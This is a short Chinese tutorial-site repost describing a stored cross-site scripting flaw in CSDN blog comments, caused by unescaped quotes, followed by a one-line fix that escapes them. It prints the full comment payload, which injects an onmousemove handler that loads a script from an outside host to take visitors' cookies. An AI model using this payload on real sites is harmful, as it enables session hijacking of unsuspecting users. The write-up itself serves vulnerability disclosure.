来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] CSDN忽视浏览器特性而产生了漏洞,可惜无法大面积使用。漏洞出现在博客,读取HTML内容时没有对引号进行转义,且无长度限制,成功获取cookie。1、首先在我旧账号的博客里,发布如下...
CSDN忽视浏览器特性而产生了漏洞,可惜无法大面积使用。 1、首先在我旧账号的博客里,发布如下两条评论(http://blog.csdn.net/llbbzh/article/details/9736979)
" class="MikuXSS" onmousemove="$.getScript('http://mikuxss.sinaapp.com/NyaNya');$('.MikuXSS').hide();" style="font-size:1px;width:100%;height:100%;position:absolute;left:0px;top:0px;cursor:default;
把第10行的 this.innerHTML = formatFeedback(this.innerHTML);改为 this.innerHTML = formatFeedback(this.innerHTML.replace("\"","""));//只有一个反斜线。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com